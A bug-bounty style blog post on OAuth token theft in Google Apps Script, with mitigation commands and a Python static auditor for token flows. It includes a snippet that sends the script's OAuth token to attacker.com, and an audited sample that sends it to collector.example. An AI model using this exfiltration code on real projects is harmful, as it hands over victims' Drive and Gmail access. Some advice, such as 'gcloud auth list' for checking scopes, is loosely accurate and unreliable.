-Click OAuth Token Hijacking on Google Apps Script – A Design Flaw Ignored? | Bug Bounty


While reviewing how Google Apps Script handles authorization, I stumbled upon a significant yet subtle security gap: OAuth tokens can be exfiltrated and abused silently within the same script project.

The core issue is the ability to exfiltrate OAuth tokens from within Google Apps Script Web Apps. An attacker with access to the project can retrieve the script's OAuth token and then use it to access and manipulate the Google services that token is scoped for.

Although Google Apps Script cannot be used to fully take over a user account, exfiltrating OAuth tokens with broad scopes (such as Google Drive or Gmail) can have severe security consequences.

📍 Writeup: https://lnkd.in/gs_AFzHn

You Should Know:

How OAuth Token Hijacking Works in Google Apps Script

1. Token Exfiltration via Malicious Script:

  • An attacker with edit access to a Google Apps Script project can inject malicious code to steal OAuth tokens.
  • Example malicious snippet:
    function stealOAuthToken() {
      const token = ScriptApp.getOAuthToken();
      UrlFetchApp.fetch("https://attacker.com/exfil?token=" + token);
    }

2. Exploiting Web Apps:

  • If the script is deployed as a Web App, an attacker can trigger token theft via crafted requests.
  • Example exploit URL:
    https://script.google.com/macros/s/{SCRIPT_ID}/exec?cmd=steal

3. Abusing Broad Scopes:

  • Tokens with `https://www.googleapis.com/auth/drive` or `https://mail.google.com/` can lead to data theft.

Mitigation Steps for Developers

1. Restrict Script Access:

  • Use `"Execute as me"` cautiously and limit script sharing.
  • Command to check active OAuth scopes:
    gcloud auth list

2. Audit Script Permissions:

  • Review Google Apps Script projects for unauthorized edits.
  • Use `clasp` (Google Apps Script CLI) to fetch a project's source for review ({SCRIPT_ID} is the project's script ID):
    clasp clone {SCRIPT_ID}

3. Monitor Token Usage:

  • Check Google Cloud Logs for suspicious token usage ({USER_EMAIL} is the account whose activity you are reviewing):
    gcloud logging read 'protoPayload.authenticationInfo.principalEmail="{USER_EMAIL}"'

For Bug Bounty Hunters

1. Test for Token Leakage:

  • Look for scripts using `ScriptApp.getOAuthToken()` without validation.
  • Use Burp Suite to intercept token transmissions.

2. Automate Detection:

  • Python script to detect exposed tokens:
    import requests

    # {SCRIPT_ID} is a placeholder for the deployed Web App's script ID
    response = requests.get("https://script.google.com/macros/s/{SCRIPT_ID}/exec")
    if "access_token" in response.text:
        print("Token leaked!")
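The request-based check above only sees what a Web App returns; the source-level review suggested under "Audit Script Permissions" and "Test for Token Leakage" can be automated by scanning the `.gs` files pulled down with `clasp`. The following static audit is an added example (not code from the writeup or from Google): it tracks variables assigned from `ScriptApp.getOAuthToken()` and flags every `UrlFetchApp.fetch()` that carries the token to a non-literal URL or to a host outside an assumed Google-API allowlist. The sample script and the `collector.example` host are constructed.

```python
import re
from urllib.parse import urlparse

# Hosts a script's own OAuth token may legitimately be sent to (assumption: an
# allowlist of Google API endpoints; extend it for your own environment).
TRUSTED_HOST_SUFFIXES = ("googleapis.com", "google.com")
_TOKEN_CALL = re.compile(r"ScriptApp\.getOAuthToken\(\)")
_TOKEN_ASSIGN = re.compile(r"\b(?:const|let|var)\s+(\w+)\s*=\s*ScriptApp\.getOAuthToken\(\)")
# Heuristic: a fetch call's argument list runs up to the ')' before the next ';'.
_FETCH_CALL = re.compile(r"UrlFetchApp\.fetch(?:All)?\(([^;]*)\)")
_URL_LITERAL = re.compile(r"""["'](https?://[^"']+)["']""")

def _host_is_trusted(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return any(host == s or host.endswith("." + s) for s in TRUSTED_HOST_SUFFIXES)

def audit_source(source: str) -> list[dict]:
    """Flag every fetch() that sends the script's OAuth token off the allowlist."""
    findings = []
    token_names = set(_TOKEN_ASSIGN.findall(source))  # variables holding the token
    for m in _FETCH_CALL.finditer(source):
        args = m.group(1)
        line = source.count("\n", 0, m.start()) + 1
        carries_token = bool(_TOKEN_CALL.search(args)) or any(
            re.search(rf"\b{re.escape(n)}\b", args) for n in token_names)
        if not carries_token:
            continue
        urls = _URL_LITERAL.findall(args)
        if not urls:  # destination built at runtime: cannot prove it stays on Google
            findings.append({"line": line, "severity": "medium",
                             "reason": "OAuth token passed to fetch with a non-literal URL"})
        for url in urls:
            if not _host_is_trusted(url):
                findings.append({"line": line, "severity": "high",
                                 "reason": f"OAuth token sent to untrusted host {urlparse(url).hostname}"})
    return findings

# Constructed sample .gs source (not from the page): one legitimate Drive API call
# and one exfiltration of the same token to an external collector.
SAMPLE_GS = """\
function listFiles() {
  const token = ScriptApp.getOAuthToken();
  UrlFetchApp.fetch("https://www.googleapis.com/drive/v3/files", {
    headers: { Authorization: "Bearer " + token }
  });
  UrlFetchApp.fetch("https://collector.example/exfil?t=" + token);
}
"""

if __name__ == "__main__":
    print(*audit_source(SAMPLE_GS), sep="\n")
```

Run it over every `.gs` file in a cloned project; the legitimate Drive call produces no finding, while the second fetch is reported as a high-severity token flow to an untrusted host.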

What Undercode Say

OAuth token hijacking in Google Apps Script highlights the risks of improper authorization handling. Developers must enforce strict access controls, audit scripts regularly, and monitor token usage. Bug hunters should focus on scripts with broad scopes and test for unintended token exposure.

Expected Output:

  • A secure Google Apps Script deployment with restricted OAuth scopes.
  • Detection of token leakage via automated scanning.
  • Improved awareness of OAuth security flaws in cloud-based scripts.

🔗 Reference: https://lnkd.in/gs_AFzHn

References:

Reported By: Phhitachi Googlevrp – Hackers Feeds